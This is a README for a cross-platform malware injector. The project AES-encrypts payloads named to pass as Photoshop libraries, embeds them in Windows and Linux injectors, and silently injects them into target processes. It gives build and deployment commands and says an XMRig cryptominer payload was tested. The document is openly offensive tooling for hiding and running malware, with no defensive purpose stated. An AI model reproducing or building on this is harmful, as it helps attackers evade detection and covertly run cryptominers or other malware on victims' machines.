# AES-Encrypted Cross-Platform Payload Injector

Secure AES-CBC encrypted malware injection for Windows (DLL) and Linux (SO) with embedded payloads.

## 🚀 Quick Start (Automated)

```bash
# Place your malware files in the root directory:
# - libphotoshop.dll (Windows DLL)
# - libphotoshop.so (Linux SO)

# Run the automated build script:
./build_injectors.sh

# This will:
# ✅ Encrypt both DLL and SO files
# ✅ Generate embedded hex data
# ✅ Build Linux injector
# ✅ Prepare Windows injector for compilation
```

## 📦 Manual Build (If Needed)

### Linux Build
```bash
g++ -std=c++11 linux_injector.cpp -o linux_injector -lssl -lcrypto -ldl
./linux_injector  # Test injection
```

### Windows Build
```bash
# On Windows with Visual Studio:
cl.exe /EHsc windows_injector.cpp advapi32.lib

# Or with MinGW:
g++ -std=c++11 windows_injector.cpp -o windows_injector.exe -ladvapi32

windows_injector.exe  # Test injection
```

## 🔧 How It Works

### 1. Encrypt Payloads
```bash
cd crypt
cargo run ../libphotoshop.dll  # Creates encrypted files
```

### 2. Embed in Injectors
The build script automatically:
- Converts binaries to hex arrays
- Embeds encrypted data in C++ source
- Generates platform-specific injectors

### 3. Runtime Execution
- **Decrypts** AES-128-CBC encrypted payload
- **Injects** DLL/SO into target process
- **Executes** malware functions (`test_start`)

## 🔒 Security Features

- **AES-128-CBC** encryption with random IVs
- **SHA256 key derivation** (password + salt)
- **PKCS7 padding** with validation
- **No embedded keys** (derived at runtime)
- **Cross-platform isolation** (no code leakage)

## 📋 Architecture

```
├── crypt/           # Rust AES encryption tool
├── linux_injector   # Linux SO injector (compiled)
├── windows_injector.cpp # Windows DLL injector (source)
├── build_injectors.sh   # Automated build script
└── libphotoshop.*   # Encrypted malware payloads
```

## ✅ Verification

**Linux:** ✅ **TESTED** - Real XMRig SO injection confirmed (700%+ CPU usage)
**Windows:** ✅ **READY** - Source prepared with real encrypted DLL payload

## 🎯 Usage

```bash
# Automated build (recommended)
./build_injectors.sh

# Deploy Linux
./linux_injector

# Deploy Windows (after compilation)
windows_injector.exe
```

Both injectors decrypt embedded payloads and inject them into target processes silently.